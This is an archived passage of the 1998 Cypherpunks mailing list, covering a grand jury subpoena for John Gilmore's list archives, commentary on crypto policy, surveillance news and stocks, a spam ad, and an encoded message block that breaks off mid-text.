experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 23 Oct 1998 10:37:22 +0800
To: cypherpunks@toad.com
Subject: Gilmore Subpoena
Message-ID: <199810230200.WAA04408@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Source: Fax from John Gilmore

[Form]

AO 110 (Rev. 12/89) Subpoena to Testify Before Grand Jury
_______________________________________________________________________

                     UNITED STATES DISTRICT COURT
                    WESTERN DISTRICT OF WASHINGTON
_______________________________________________________________________

To: 
    John Gilmore                    SUBPOENA TO TESTIFY
    210 Clayton Street              BEFORE GRAND JURY
    San Francisco, CA 94117

                              SUBPOENA FOR:
                              [X] PERSON   [X] DOCUMENT(S) OBJECT(S)

 YOU ARE HEREBY COMMANDED to appear before the Grand Jury of the United
States District Court at the place, date and time specified below.

_______________________________________________________________________
PLACE                                        | COURTROOM
                                             |
     United States Courthouse                | 	Room 311
     5th and Madison                         |_________________________
     Seattle, WA 98104                       | DATE AND TIME
                                             |
                                             |  November 10, 1998
                                             |  1:15 P.M.
_____________________________________________|_________________________

 YOU ARE ALSO COMMANDED to bring with you the following document(s) or 
object(s):*

   Please provide any and all of the following:

        a.   All electronic mail messages received, stored or
             otherwise obtained from or regarding the "Cypherpunks;"

        b.   Any and all Cypherpunk archives obtained, stored, or
             controlled by you; and

        c.   Any an all messages, correspondence, or e-mail,
             received from or involving CARL JOHNSON, C.J. PARKER,
             TOTO, TRUTHMONGER, A FIEND, to specifically include
             correspondence received from CARL JOHNSON while he was
             in Federal custody.


[ ] Please see additional information on reverse

 This subpoena shall remain in effect until you are granted leave to
depart by the court or by an officer acting on behalf of the court.
_______________________________________________________________________
CLERK                                                | DATE
          BRUCE RIFKIN            Issued in Blank    | Oct 6, 1998
_____________________________________________________| 1998R00917
(BY) DEPUTY CLERK                                    | GJ 98-1
     [Signature of Patricia McCabe]                  | S/N #19917
_____________________________________________________|_________________
                                     | NAME ADDRESS AND PHONE NUMBER OF
This subpoena is issued on           | ASSISTANT U.S. ATTORNEY
application of the United States     | 
of America                           | ROBB LONDON, AUSA
                                     | UNITED STATES ATTORNEY'S OFFICE
                                     | 800 5TH AVENUE, SUITE #3600
                                     | SEATTLE, WA 98104 206/553-7970
_____________________________________|_________________________________

* If not applicable enter "none"

[End subpoena]

JG Note:

  Preliminary advice from an attorney is that it is likely the
  Electronic Communications Privacy Act covers this request for stored
  electronic communications, therefore requiring a real warrant (not a
  subpoena), reimbursement for the expenses of complying, etc.

  Others (if any) who have received similar subpoenas should
  consult with their attorneys, and are encouraged to publish
  (to the list and the JYA.COM web site) anything they receive
  from the government.  Having more information is usually
  a good thing; currently the prosecutor knows what he's doing,
  so to speak, but we don't.

----------

This is archived at:

   http://jya.com/cej-wwa-jg.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 23 Oct 1998 11:11:16 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Gilmore Subpoena (fwd)
Message-ID: <199810230255.VAA10289@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 22 Oct 1998 21:52:20 -0400
> From: John Young <jya@pipeline.com>
> Subject: Gilmore Subpoena

> [Form]
> 
> AO 110 (Rev. 12/89) Subpoena to Testify Before Grand Jury
> _______________________________________________________________________
> 
>                      UNITED STATES DISTRICT COURT
>                     WESTERN DISTRICT OF WASHINGTON
> _______________________________________________________________________
> 
> To: 
>     John Gilmore                    SUBPOENA TO TESTIFY
>     210 Clayton Street              BEFORE GRAND JURY
>     San Francisco, CA 94117
>

Mine looks pretty much identical.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 23 Oct 1998 13:45:15 +0800
To: cypherpunks@cyberpass.net
Subject: Cryptographic Dog Stocks, The Dirigible Biplane, and  Sending theWizards Back to Menlo Park
In-Reply-To: <v04003a08b2551ff61c93@[198.115.179.81]>
Message-ID: <v03130300b255c0236071@[209.133.20.23]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:18 PM -0700 10/22/98, Vin McLellan wrote:

>	Hettinga essays are like handball games: the damn ball is
>ricocheting off the side walls, both ends, the floor and the ceiling.
>Linear coherence and internal consistency are less important than the
>electrostatic energy and the rolling rhetorical thunder -- so hey, no big
>deal if he's a little frisky and expansive with the facts, right?

I've been a critic of some of Bob's "exuberance," his tendency to go off on
rhetorical flights of fancy, his irritating "ums" and "ers" and ":-}"s, and
his generally opaque writing style.

I think there's a kernel of good thinking in there, but his attention seems
to flit about. And he seems more interesting in cutesy turns of phrase than
in persuasive exposition.

If there's stuff there, it's lost in the freneticism.

>	Said Mr. Hettinga:
>
>>	It's beginning to look like venture capital is an
>>industrial phenomenon, requiring correspondingly long
>>ramp-up times, and it may be that geodesic markets move too
>>fast for any "consensus" of the investment community to be
>>achieved and, um, capitalized upon, soon enough to make
>>money on a consistent basis, or at least in the presence of
>>a savvy management team.
>
>	Gotta love a guy who can write a sentence like that, knot and and
>double-knot it into a gangly tapestry -- and then glue the whole thing
>across a wonderful image like a "dirigible biplane."
>
>	(That's a Hettinga vehicle is ever there was one. Even in the
>imagination, it pushes or pulls large amounts of gas around in an unusually
>muscular way;-)

Indeed.

I guess some folks are amazed that anyone can write the way Bob does. Me, I
was never amazed by the writings of Detweiler, Toto, or Hettinga.


--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 23 Oct 1998 11:11:07 +0800
To: cypherpunks@toad.com
Subject: Re: Gilmore Subpoena
In-Reply-To: <199810230200.WAA04408@camel8.mindspring.com>
Message-ID: <v04020a02b25599a8f28d@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:52 PM -0400 on 10/22/98, John Young wrote:


>     John Gilmore                    SUBPOENA TO TESTIFY
>     210 Clayton Street              BEFORE GRAND JURY
>     San Francisco, CA 94117

Boy, did *they* pick the wrong guy...

:-).

I haven't had this much fun since the hogs ate my little brother...

Cheers,
Bob Hettinga


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: launch@launchmaster.com
Date: Fri, 23 Oct 1998 11:05:21 +0800
To: cypherpunks@Algebra.COM
Subject: Is Your Web Site A Secret?
Message-ID: <199810230233.WAA23527@www.launchmaster.com>
MIME-Version: 1.0
Content-Type: text/plain



     Is your web site the best kept secret on the Internet?

     We'll promote it to 50 search engines and indexes for $85
     and complete the job in 2 business days.  Satisfaction is
     guaranteed!

If you have a great product, but are not getting many inquiries from
your Web site, you may not be adequately listed on the Web's search
engines and indexes.

Millions of viewers daily use these facilities to find the products
and services they are looking for.  But if your site is not listed, no
one will see it.

Listings on most of these services are free.  However, locating and
filling out the forms required to get a listing can take several days,
and most people just don't have the time to do it.

That is why we offer a web site promotion service.

WHAT'S THE DEAL?

We will submit your site to 50 indexes and search engines for $85.  We
will accept the return of this E-mail, with the form below filled out,
as an order.  We will bill you upon completion of the promotion.  Our
terms are net 15 days from date of invoice.  Satisfaction guaranteed!

HOW LONG WILL IT TAKE?

Generally, we complete the submissions within 48 hours of
receiving your order.  It can take any individual search engine or
index up to three weeks to process your submission, although most are
much faster.

WHAT SEARCH ENGINES AND INDEXES ARE INCLUDED IN THE
PROMOTION?

The list changes from time to time.  This is our current list:

Alta Vista, Anzwers, AOL Netfind, BizCardz Business Directory, Bizlink,
BizWeb, Black Widow Search, Excite, Galaxy, HotBot, Infomak, Infoseek, 
InfoSpace, InterBis, Jayde Online Directory, Jumpcity, Jumper Hot Links, JumpLink, 
LinkMonster, Lycos, MangaSeeker, Manufacturers Information Network, 
Net Happenings, Net Announce, New Page List, New Riders WWW Yellow Pages, 
Northern Light, One World Plaza, PeekABoo, Planet Search, Power Crawler, 
QuestFinder, Scrub The Web, Seven Wonders, SiteFinder, SiteShack, Super Snooper, 
The YellowPages.com, TurnPike, Unlock: The Information Exchange, WebCrawler, 
WebVenture Hotlist, WhatUSeek, Where2Go, WhoWhere, World Announce Archive, 
Wow! Web Wonders!, YeeHaa!, Yellow Pages Superhighway, YelloWWWeb, Your Webscout, 
ZenFinder.


HOW WILL I KNOW THAT YOU HAVE PROMOTED MY SITE?

When we have completed the promotion, we will send you an HTML
file as an attachment to your E-mail bill.  Save this file to your
disk, and view it through your Web browser.  It provides links to the
search engine we submitted your site to, plus any comments we received
from them when we did it.

ARE THERE ANY GUARANTEES?

We do not require prepayment.  Your satisfaction is guaranteed or
you don't pay the bill.

WHO IS LAUNCHMASTER?

We are a web site promotion company located at:

   LaunchMaster, Inc.
   12 Godfrey Place
   Wilton CT 06897
   Phone: (877) 278-0875
   Fax:   (800) 321-6966
   Email: launch@launchmaster.com


HOW DO I ORDER?

The easiest way to order is by e-mail.  Just hit the REPLY button on
your e-mail program and fill out the following information. (This
information will be posted to the search engines/indexes):

Your name: 
Company Name:
Address:
City:              State/Prov:     Zip/Postal Code: 
Telephone: 
Fax: 
Email address: 
URL:  http://
Site Title: 
Description (about 25 words): 
Key words (maximum of 25, in descending order of importance):

Contact (in case we have questions): 

If  billing a different address, please complete the following:

Addressee: 
Company Name:
Address:
City:              State/Prov:     Zip/Postal Code: 
Telephone: 
Fax: 
Email address: 

We will bill via Email. (A9 10/22/98)

Terms:  By returning this document via Email, you agree as follows:
You have the authority to purchase this service on behalf of your
company.    Terms are net 15 days.  Accounts sent to collections will
be liable for collection costs.  You agree to protect and indemnify
LaunchMaster, Inc. in any claim for libel, copyright violations, plagiarism,
or privacy and other suits or claims based on the content or subject 
matter of  your site.

WHAT HAPPENS NEXT?

When we receive your order, we will acknowledge it via return email. 
We will then input your information into our system.

When completed, we will run your promotion, capturing any comments
from search engines as we go.  We will incorporate these into an
HTML-formatted report to you, which we will attach to your bill.
======================Web Site Promotions======================
                      Launchmaster, Inc.
                       12 Godfrey Place
                        Wilton CT 06897
Ph: (877) 278-0875  Fx: (800) 321-6966  E-mail: launch@launchmaster.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 23 Oct 1998 05:10:31 +0800
To: cypherpunks@Algebra.COM
Subject: U.S. Group Sues To Stop Internet Pornography Act
Message-ID: <199810222042.WAA12514@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




http://dailynews.yahoo.com/headlines/ts/story.html?s=v/nm/19981022/ts/porn_1.html

        




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Fri, 23 Oct 1998 14:19:47 +0800
To: Mark Hedges <hua@teralogic-inc.com>
Subject: Re: Censored news topic censored ...
Message-ID: <3.0.32.19981022224257.02b8c9a8@shell15.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



I don't speak up here much but I can't let this go: the next time you hear
William Buckley on the Commonwealth Club broadcast on NPR, or hear the
almost-commercial-broadcast-length squibs that pretend to be underwriter
attributions but which are really tiny little commercials for ADM
"Supermarket to the World" or Wells Fargo "Making Your Time Count," ask
yourself who NPR is really working for, and set your expectations
accordingly.  Then send your checks to Pacifica to support free-speech
radio.  



At 03:00 PM 10/22/98 -0700, Mark Hedges wrote:
>
>It sounds like even the enlightened folks at NPR don't have the guts
>to stand up and say something about issues as critical as expanded
>FBI powers over citizens and the sneaky tricks used to pass those laws.
>
>It's not really a big surprise, though.  Monica Lewinsky's blowjobs
>take precedence over incredulous claims like 'NSA SPIES ON EVERYONE'
>and 'FBI MONITORS YOU WITHOUT WARRANTS'.
>
>They will have to live with their own lack of character. So will we.
>
>Mark Hedges
>
>
>At 1:13 PM -0700 10/22/98, Ernest Hua wrote:
>>Dear TOTN at NPR,
>>
>>This is most distressing.  I was one of the very first
>>callers to your Talk of the Nation show today whose
>>topic was relevant news reporting in the US.  My topic
>>was the lack of reporting on the FBI's last minute
>>sneak of the roving wire tap proposal into the
>>intelligence budget bill.  I wanted Ray to talk about
>>the editorial process and how these things get dropped
>>on the floor as this item is extremely important to
>>our democracy because it is an agency charged with
>>protecting our Constitutional rights (the FBI) who is
>>deliberately circumventing the democratic legislative
>>process to pass a law which was sounded defeated two
>>years ago in open debate.
>>
>>Ironically, my topic was censored, and I waited an
>>hour, while other people wanted to discuss things
>>like how they can vent about their divorce
>>difficulties through the Monica Lewinsky scandal, only
>>to be dropped in the end.
>>
>>Would any of the NPR staff or Mr. Suarez would like
>>to explain just what happened here?
>>
>>Ern
>>
>>--------
>>Ernest Hua, TeraLogic Inc, 1300 Villa St, Mountain View, CA 94041
>>(650) 526-6064, hua@teralogic-inc.com
>
>
>
>________________________________________________________________
>  Mark Hedges      hedges@infopeace.com      www.infopeace.com
>
>  "One does not establish a dictatorship in order to safeguard
>  a revolution; one makes the revolution in order to establish
>  a dictatorship."  O'Brien from 1984, George Orwell
>________________________________________________________________
>
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 23 Oct 1998 14:51:48 +0800
To: cypherpunks@Algebra.COM
Subject: Re: UK Government unveils crypto escrow legislation
In-Reply-To: <199810230147.SAA25775@toad.com>
Message-ID: <v03130302b255ceabcdca@[209.66.100.86]>
MIME-Version: 1.0
Content-Type: text/plain




>Date: Thu, 22 Oct 1998 15:38:10 +0100
>From: Malcolm Hutty <cacib@liberty.org.uk>
>To: declan@well.com
>Subject: UK Government unveils crypto escrow legislation
>
>The UK government has announced legislation designed to force
>escrow of confidentiality keys on UK netizens.
>
>They are planning a licenced system of Certificate Authorities in an
>attempt to force key escrow down the throats of British computer
>users. This could be a model for other governments. The idea is
>that digital signatures get preferential legal treatment if certified by
>a licenced CA, but to get a licence you must escrow confidentiality
>keys.

So much for the notion espoused by Labor supporters, notably Philip
Hallam-Baker, that the Tony Blair government would of course never support
the evil policies originally floated by the Conservatives.

Yeah, like George Bush wouldn't have supported Clipper had he won in '92.


--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 23 Oct 1998 06:45:50 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199810222213.AAA19903@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> What is privacy?

In the longwords of Toto the Manicgnificant (tm):

	The ability to say, "fuck off", and mean it.








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 23 Oct 1998 06:48:09 +0800
To: cypherpunks@toad.com
Subject: Women cannot commit rape?
Message-ID: <199810222217.AAA20293@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Trees cannot be indicted for assasination

-Bono Kennedy










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vin McLellan <vin@shore.net>
Date: Fri, 23 Oct 1998 12:59:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: dbts: Cryptographic Dog Stocks, The Dirigible Biplane, andSending the Wizards Back to Menlo Park
Message-ID: <v04003a08b2551ff61c93@[198.115.179.81]>
MIME-Version: 1.0
Content-Type: text/plain



	Jeeez, I hope no one else sprained a finger getting the current
stock price for Security Dynamics (SDTI). Robert Hettinga
<rah@shipwright.com> took certain, ummm, dramatic liberties as he
paraphrased a Boston Globe column yesterday on Bay State stocks that had
"been discounted so deeply they raise eyebrows."

	Said Mr. Hettinga:

>It seems that Security Dynamics, trading at about 6, about >10% or so of
>its high, is now considered an official dog >stock as defined by today's
>Boston Globe.

	What the Globe actually said was:

"Security Dynamics Technologies Inc. of Bedford, a leader in computer
security and encryption, has fallen from an April high of 42 1/2 to 12
yesterday. It traded as low as 6 two weeks ago."

	Said Mr. Hettinga:

>Anyway, most of the comments in the article were about SD's >hardware
>token technology being made obsolete by digital >"certificates". (The
>Globe's quotes, but I agree with them. >Just like I put quotes around
>digital "signatures", which >are nothing of the kind, though I haven't
>heard of >something better call *them* yet, either.) The Globe did
>>mention SD buying RSA, but they forgot to mention anything >about the RSA
>patent expiring soon. About the only thing >they said was valuable about
>SD was their share in that >roaring success, Verisign, Inc., who, the
>Globe seems to >imply, is evidently the sole marketer of those self-same
>>digital "certificates". I wonder what Thawte, CertCo, >Entrust, etc.made
>of *that* comment...

	Hmmmm. What the Globe actually said was:

	"Security Dynamics made money for years selling authentication
systems for corporate computer users and later acquired RSA Data Security,
an Internet encryption leader. Now its original authentication products are
being
challenged by new technology using so-called ``digital certificates'' to
make computer communication and commerce secure - a serious problem that
has hurt the stock.

	"But Security Dynamics, with a current market value of about $490
million, could still offer a bigger company a leading position in the
important computer security field and a huge embedded customer base.

	"Security Dynamics also owns a stake in Verisign Inc., a competitor
in the digital certificate field. The company's cash and its investment in
Verisign amount to about $6.50 per share, slightly more than half the
stock's current price."

	Hettinga essays are like handball games: the damn ball is
ricocheting off the side walls, both ends, the floor and the ceiling.
Linear coherence and internal consistency are less important than the
electrostatic energy and the rolling rhetorical thunder -- so hey, no big
deal if he's a little frisky and expansive with the facts, right?

	For the full Globe article, cut & paste this URL:
<http://www.boston.com/cgi-bin/passiton.cgi?globehtml/294/Among_Bay_State_s_batt
ered_tech_fir.shtml>

	Wall Street has not been kind to SDTI, from whom I have collected
many checks for contract assignments over the years. Mr. Hettinga's
explanation of the market's dynamics is, at the very least, guaranteed to
stimulate.

	Hettinga's apparent scorn for modern cryptography's obsession with
strong authentication  -- now manifest in the intensity with which
professionals worry the issues around PKC binding, key certification,
digital signatures, CA procedures (and in the demand for smartcards to
secure X509 certs apart from the networked CPU) -- bespeaks a truly
iconoclastic mind.

	What tucked me in for the night was the declaration -- from R.H.,
the avatar of DBTS, e-cash, and geodesic recursive auctions -- that
(venture) capital is or will be counterproductive to entreprenurial
enterprise in the New Age. Un huh. Doomed, as well, by the hesitation
inherent in the merely human minds that control its flow (at least in Rob's
universe of cybernetic fiscal structures.)

	Said Mr. Hettinga:

>	It's beginning to look like venture capital is an
>industrial phenomenon, requiring correspondingly long
>ramp-up times, and it may be that geodesic markets move too
>fast for any "consensus" of the investment community to be
>achieved and, um, capitalized upon, soon enough to make
>money on a consistent basis, or at least in the presence of
>a savvy management team.

	Gotta love a guy who can write a sentence like that, knot and and
double-knot it into a gangly tapestry -- and then glue the whole thing
across a wonderful image like a "dirigible biplane."

	(That's a Hettinga vehicle is ever there was one. Even in the
imagination, it pushes or pulls large amounts of gas around in an unusually
muscular way;-)

	Suerte,
		_Vin

-----
"Cryptography is like literacy in the Dark Ages. Infinitely potent, for
good and ill... yet basically an intellectual construct, an idea, which by
its nature will resist efforts to restrict it to bureaucrats and others who
deem only themselves worthy of such Privilege."
_ A Thinking Man's Creed for Crypto  _vbm.

 *     Vin McLellan + The Privacy Guild + <vin@shore.net>    *
      53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 23 Oct 1998 16:28:22 +0800
To: cypherpunks@cyberpass.net
Subject: echelon in UK
Message-ID: <199810230759.AAA23532@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



echelon is getting a *lot* of european coverage in their
newspapers and magazines over the last few weeks/months.
I find this quite remarkable. here in the US where we
pride ourselves on civil freedom, the public does not
even *squeak* about the massive NSA superstructure.
but the european community is starting to get fidgety
and uppity.

I sincerely hope that this pressure can be increased.
it would be quite ironic if the nsa began to feel heat
by *outside* countries, without the slightest raised
eyebrow by the submissive, prostrate US taxpayer
even as they suck up something
like 50 odd billion dollars a year out of our budget
without a trace.

personally I think an awesome cypherpunk project/campaign
would be an info-fight against the NSA. a guerrila style
campaign in which people try to plaster the message
everywhere, and "hack" the mainstream media.

the time is ripe, with the echelon brouhaha. it's a pity that hackers
spend their time fighting over somethig like Kevin
Mitnick when they could truly change the us govt as
we know it. I propose a continued, cyberguerilla
campaign to put the NSA into the public light and
make them squirm as much as a spook can do so (and
I'm certain they are *very* squirmy)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 23 Oct 1998 16:30:21 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Enhanced Ability to Tap Cell Phones
Message-ID: <199810230804.BAA23905@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Enhanced Ability to Tap Cell Phones
Date: Thu, 22 Oct 1998 11:21:56 -0500
To: believer@telepath.com

Source:  Washington Post
http://www.washingtonpost.com/wp-srv/washtech/cell1022.htm

Federal Plan Would Enhance Police
Ability to Tap Cell Phones 

By Jeannine Aversa
Associated Press Writer
Thursday, October 22, 1998; 11:16 a.m. EDT 

WASHINGTON - Law enforcement officials say they need to know
where a suspected criminal is when he makes a cellular telephone call.
Federal regulators are proposing to give them the capability to find out. 

The Federal Communications Commission without dissent proposed
today that cellular phone companies make technical changes so the FBI,
police and other law enforcers - as long as a court approves - can
locate a person talking on a mobile phone. 

This and other additional wiretapping capabilities being proposed aim to
help law enforcers keep pace with technology. 

With some 66 million cellular phone customers, police want the authority
to legally tap cell phones to track down drug dealers, terrorists and
kidnappers. But some groups worry that such a practice could violate
privacy. 

The location proposal is part of a larger plan to implement a 1994 law that
requires telecommunications companies to make changes in their networks
so police are able to carry out court-ordered wiretaps in a world of digital
technology. The proposal is based on a plan from the telecommunications
industry. 

"We think this is a positive step forward," said Stephen Colgate, the
Justice Department's assistant attorney general for administration. "In
many kidnapping cases, it would have been very helpful to have location
information." 

But James Dempsey, counsel to the Center for Democracy and
Technology, a privacy group, said: "We're prepared to fight this one every
step of the way." 

FCC Chairman Bill Kennard stressed that police would have no access to
locations without a court order. 

"A lot of people are saying the FCC will turn mobile phones into tracking
devices for the FBI and invade Americans' privacy. I don't believe that
will be the case," Kennard said. 

With a court order, police already can legally listen in to cell phone
conversations, and, in some instances, get information on the caller's
location. 

But not every company has the technical ability to provide a caller's
location. This proposal, if adopted, would set up a nationwide requirement
for companies to follow. 

The legal standard for obtaining a location is lower than the standard for a
wiretap order in which police must show a judge there is probable cause
of criminal activity. 

Under the proposal, police would only need to show the location is
relevant to an investigation. Privacy groups say that means the government
could easily track the movements not only of a suspect, but also of
associates, friends or relatives. 

It would give police the ability to obtain the cellular phone user's location
at the beginning and end of a wiretapped call. 

The proposal would provide police with that information based on the
cellular tower, or "cell" site, where a call originated and ended. That would
give information on the caller's location within several city blocks in an
urban area to hundreds of square miles in a rural area. 

The FBI had been seeking more exact location information. 

The FCC also is expected to tentatively conclude that companies must
give police, as long as a court approves, additional capabilities - beyond
minimum technical standards already proposed by the industry - so their
ability to conduct wiretaps won't be thwarted. 

The additional capabilities being sought by the FBI that were advanced by
the FCC include: 

-Giving police the ability to listen in on the conversations of all people on
a conference call, even if some are put on hold and no longer talking to the
target of a wiretap. 

-Giving police the ability to get information when the wiretap target has
put someone on hold or dropped someone from a conference call; and to
know if the wiretap target has used dialing features - such as call waiting
or call forwarding. 

-Giving police the number dialed by a wiretap target when the suspect,
for instance, uses a credit or calling card at a pay phone. 

Privacy groups and the telephone industry contend the additional
capabilities sought by the FBI go beyond the 1994 law and are an attempt
to broaden wiretapping powers. The FBI says it merely wants to preserve
the ability to conduct legal wiretaps in a world of constantly changing
technology. 

The FCC is involved because the Justice Department, FBI and the
telecommunications industry, after three years of negotiations, were unable
to reach agreement on the larger plan for implementing the 1994 law. 

All interested parties will get a chance to offer opinions on the proposal,
which could be revised. Kennard wants a final plan adopted by the end of
the year. 

 (c) Copyright 1998 The Associated Press 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pallas Anonymous Remailer <athena@cyberpass.net>
Date: Fri, 23 Oct 1998 23:39:13 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Is Your Web Site A Secret?
Message-ID: <cf1382fae8d43479048c4cfa3e5d9663@anonymous>
MIME-Version: 1.0
Content-Type: text/plain




launch@launchmaster.com wrote:
> 
>      Is your web site the best kept secret on the Internet?
> 
>      We'll promote it to 50 search engines and indexes for $85
>      and complete the job in 2 business days.  Satisfaction is
>      guaranteed!
> 
...

> 
> WHAT SEARCH ENGINES AND INDEXES ARE INCLUDED IN THE
> PROMOTION?
> 
> The list changes from time to time.  This is our current list:
> 
> Alta Vista, Anzwers, AOL Netfind, BizCardz Business Directory, Bizlink,
> BizWeb, Black Widow Search, Excite, Galaxy, HotBot, Infomak, Infoseek,
> InfoSpace, InterBis, Jayde Online Directory, Jumpcity, Jumper Hot Links, JumpLink,
> LinkMonster, Lycos, MangaSeeker, Manufacturers Information Network,
> Net Happenings, Net Announce, New Page List, New Riders WWW Yellow Pages,
> Northern Light, One World Plaza, PeekABoo, Planet Search, Power Crawler,
> QuestFinder, Scrub The Web, Seven Wonders, SiteFinder, SiteShack, Super Snooper,
> The YellowPages.com, TurnPike, Unlock: The Information Exchange, WebCrawler,
> WebVenture Hotlist, WhatUSeek, Where2Go, WhoWhere, World Announce Archive,
> Wow! Web Wonders!, YeeHaa!, Yellow Pages Superhighway, YelloWWWeb, Your Webscout,
> ZenFinder.
> 

I notice dorkslayers isn't on your list. I think you should add it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Fri, 23 Oct 1998 16:38:48 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <19981023080004.20320.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



owF3VkuLHLkN9cab9CXgfYUWvoDD+lgzDmlGMTMRY3uHJJFJuEgixU+Vsu/kO/oh
2+wdeFSzSOD9gP/+6S/rH/uIWv+Anw9tRh1qlb5OrUHGBZs1aC5SaW9c48YjSaOQ
NMdV20g0yaZ25cpLk2Pmrg+54es2mIKOpoH6wK02Oy5Zr5MzNdFKa+Z+JCn+j26F
F65D6lkIT8g2M9lxWL+qebMs7+whdbSTihYNd6078Xr2fqM9c7HmtxwogBsPw7Eh
5Rg3vORVxoXzkXhFP/ssBZdIC7Mp5zdEP1jDu7RyzhxJa5SsaxbaOW75XByGJn3Q
wRn/bIbnKaBWASSbjr8SfdGBp0LiPrQLlYqmqoYbRdZ+vqHlwwxZI3BQ3JvsSZ1j
zLLyTl1XzbjtRlUmLp89zMyNfrECGHu2nesSrH6d0lDsW24jyxikZW22ZzX6sWlP
hR2kL2BFD2rcZMO79JmBRJfG18EO0l6snEGGdDT6YCDgLx+z93NBTdoLHdYO8zaC
ncTbxo5F5ZOS1CD0SSACCADEPnTiOMiwbVtcL1pRMmhd6aFhaEEF77jLSVE2f4n2
8+jTP37bWHP228qUvGzQ2KW6xEc2jScerxtgF+eH5w6opazcdkPln1hj5qf3+/4L
Csg2cOxXriGhyWI20mpN6PcEXhS1Hs3iDIOyGfr6uae79bREhVIKpBcCznwozk1P
PEA3vmAb/Wd+GwwJCl76GZD/S3jHyZa0GuHCJC6/gbOHYy05owOJO/rl48he+7/R
1LJBF64VgRY53OkJfYMXW7PuQpe+muwVYD79JNQQCaK4o2VpOmZfVu3j4qEfEvBg
D3aAWJAdxIX/RWqiX6GY9rhg1XJY1iGQ/wF1yNIlKiw8LnlLhLDmimc3IAsOagXg
3FZLZ4R9IH0cBWGwycuLLbCpNhh2g1zajZ7yGgFAZmz6jcosXlqa9e5IF4WCdbhx
Njiz8EVs0BZw6L3VysTRvezOns5m46KOw+Y4RIL+UfRYNkHr5Gj0wIf3zkFC423A
dpvbbyQ0gkB5wrxQHwpPEuG8Pl5dG6FCnBjcQoIGQclVy2dosk082LkK/aI7IxU0
sst7r9zTbQGAzdYLcpgigRd0DD+jVHaKPX6cHMRavULkn9K+QZq/S3NsYPnP4TOo
